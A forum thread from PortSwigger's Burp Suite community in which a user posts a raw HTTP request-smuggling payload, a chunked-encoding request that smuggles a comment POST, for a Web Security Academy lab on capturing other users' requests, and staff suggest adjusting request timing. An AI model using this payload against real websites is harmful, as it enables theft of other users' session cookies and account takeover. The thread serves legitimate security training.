Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: Exploiting HTTP request smuggling to capture other users' requests

paul | Last updated: May 24, 2022 12:53PM UTC

Hi there, I tried to solve this lab by smuggling a request such as POST / HTTP/1.1 Host: ac4f1f861e1580afc0ad62b3000a0048.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Content-Length: 251 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 550 Cookie: session=q5cEzGqrR8HXNm4Gdj7YeZl5lAtA2Qun csrf=pVuanGwkuFGLKWvbiMMoF2B99t9iyIwo&postId=4&name=aa&email=a%40a.com&website=&comment=Testing I can see GET requests being reflected in the comments of the blog but the only session cookie I see reflected is my own testGET /post?postId=4 HTTP/1.1 Host: ac4f1f861e1580afc0ad62b3000a0048.web-security-academy.net Cookie: session=q5cEzGqrR8HXNm4Gdj7YeZl5lAtA2Qun User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://ac4f1f861e1580af There's one more GET I see but it contains no session cookie. It doesn't seem to matter how many times I repeat the request, and increasing the content-length of the smuggled request has also not helped?

Michelle, PortSwigger Agent | Last updated: May 26, 2022 12:15PM UTC

Thanks for your message. We've tried out the lab and have been able to see comments that include the victim's details (sometimes we did catch our own requests but you should see a mix of the two). Have you tried experimenting with the frequency of the requests you're sending, maybe try sending a couple slightly closer together, to see if that helps?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.